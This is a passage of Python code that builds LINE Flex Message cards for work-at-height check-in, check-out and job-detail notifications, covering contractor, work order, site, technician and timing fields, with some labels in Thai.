"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_mame,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MobilePhoneFLS :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MangementName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": management,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "TypeOfJob :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": type_job,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JLA/RAReviewed :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": jla_ra,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkerInvolved ? : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": any_ssw,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Observation ? :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": physical,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Remarks :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": remark,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
arry_contants.append(contents_submit_wah)
return data_wah
if type == 'onsite' :
data = count_wah_submit_detail
arry_contants = []
data_wah = {"type": "flex",
"altText": "Flex Message",
"contents":
{
"type": "carousel",
"contents":
arry_contants
} }
for I in data :
# Title = (I['Title'])
print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
print (workorder)
print (company)
print (opended)
print (status)
print (startwork)
print (completedwork)
print (caller)
print (wah_status)
print (timestramp)
print (planned_date)
print (job_description)
print (fls_mame)
print (fls_phone)
print (management)
print (remark)
print (type_job)
print (jla_ra)
print (any_ssw)
print (physical)
print (fm)
contents_submit_wah = {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "WAH - DETAIL OF WORK",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Contractor :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "PlanedDate :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(planned_date),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkOrder :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "SiteName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JobDescriptions :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_mame,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MobilePhoneFLS :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MangementName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": management,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "TypeOfJob :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": type_job,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JLA/RAReviewed :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": jla_ra,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkerInvolved ? : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": any_ssw,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Observation ? :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": physical,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Remarks :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": remark,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CheckIn Time :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
arry_contants.append(contents_submit_wah)
return data_wah
def linedetailcheck (detail_checkin,type):
if type == 'completed' :
for I in detail_checkin :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {
"type": "flex",
"altText": "Flex Message",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "รายละเอียดของงาน",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "ผู้รับเหมา :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "เลขแจ้งซ่อม :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "สถานี :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "รายละเอียดงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "ช่างที่เข้าทำงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_startwork,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "เบอร์โทรช่าง :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "วันที่เข้าจบงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
}
return data
if type == 'onsite' :
for I in detail_checkin :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {
"type": "flex",
"altText": "Flex Message",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "รายละเอียดของงาน",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "ผู้รับเหมา :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "เลขแจ้งซ่อม :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "สถานี :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "รายละเอียดงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "ช่างที่เข้าทำงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_startwork,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "เบอร์โทรช่าง :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "วันที่เข้าทำงาน :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
}
return data
if type == 'admin2' :
for I in detail_checkin :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_completedwork = I.fls_completedwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {
"type": "flex",
"altText": "Flex Message",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "CHECKOUT WAH NOTIFY",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Contractor :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "PlanedDate :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(planned_date),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkOrder :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "SiteName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JobDescriptions :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": job_description,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName CheckIn :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_startwork,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "FlsName CheckOut :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_completedwork,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MobilePhoneFLS :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fls_phone,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "MangementName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": management,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "TypeOfJob :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": type_job,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JLA/RAReviewed :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": jla_ra,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkerInvolved ? : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": any_ssw,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Observation ? :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": physical,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CBRE FM : ",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": fm,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Remarks :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": remark,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CheckIn Time",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(startwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "CheckOut Time",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(completedwork),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
}
]
}
}
}
return data
print("OK")
if type == 'admin' :
for I in detail_checkin :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {
"type": "flex",
"altText": "Flex Message",
"contents": {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "CHECK IN WAH NOTIFY",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Contractor :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "PlanedDate :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(planned_date),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkOrder :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
